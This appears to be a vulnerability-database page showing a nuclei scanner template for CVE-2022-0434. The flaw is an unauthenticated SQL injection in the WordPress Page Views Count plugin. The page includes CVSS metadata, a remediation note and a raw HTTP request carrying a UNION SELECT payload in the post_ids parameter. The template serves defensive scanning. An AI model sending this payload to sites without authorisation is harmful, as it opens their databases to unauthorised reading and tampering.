Lucene search
K

WordPress Page Views Count <2.4.15 - SQL Injection

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 81 Views

WordPress Page Views Count <2.4.15 - SQL Injection. Unauthenticated SQL injection vulnerability allows unauthorized access to WordPress database

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-0434
7 Mar 202209:15
attackerkb
Circl
CVE-2022-0434
8 Jul 202521:02
circl
CNNVD
WordPress plugin Page View Count SQL注入漏洞
7 Mar 202200:00
cnnvd
CVE
CVE-2022-0434
7 Mar 202208:16
cve
Cvelist
CVE-2022-0434 Page Views Count < 2.4.15 - Unauthenticated SQL Injection
7 Mar 202208:16
cvelist
NVD
CVE-2022-0434
7 Mar 202209:15
nvd
OSV
CVE-2022-0434
7 Mar 202209:15
osv
Patchstack
WordPress Page View Count plugin <= 2.4.14 - Unauthenticated SQL Injection (SQLi) vulnerability
1 Feb 202200:00
patchstack
Prion
Sql injection
7 Mar 202209:15
prion
RedhatCVE
CVE-2022-0434
9 Jan 202610:45
redhatcve
Rows per page
id: CVE-2022-0434

info:
  name: WordPress Page Views Count <2.4.15 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress Page Views Count plugin prior to 2.4.15 contains an unauthenticated SQL injection vulnerability.  It does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.
  remediation: |
    Update to the latest version of the WordPress Page Views Count plugin (2.4.15) to mitigate the SQL Injection vulnerability.
  reference:
    - https://wpscan.com/vulnerability/be895016-7365-4ce4-a54f-f36d0ef2d6f1
    - https://wordpress.org/plugins/page-views-count/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0434
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0434
    cwe-id: CWE-89
    epss-score: 0.14783
    epss-percentile: 0.96271
    cpe: cpe:2.3:a:a3rev:page_view_count:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: a3rev
    product: page_view_count
    framework: wordpress
  tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wpscan,unauth,a3rev,vkev,vuln
variables:
  num: "999999999"

http:
  - raw:
      - |
        GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5({{num}}),null,null%20--%20g HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'

      - type: status
        status:
          - 200
# digest: 490a00463044022052d2f8c5263a647c98082a593b1c89ff41a4f8732e90a1c91ba8f8b16ffefaf7022073791243686ce2f5188d6d58278ae98459fe40a1392977ba2584b5a29715f2b0:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 27.5
CVSS 3.19.8
EPSS0.14783
81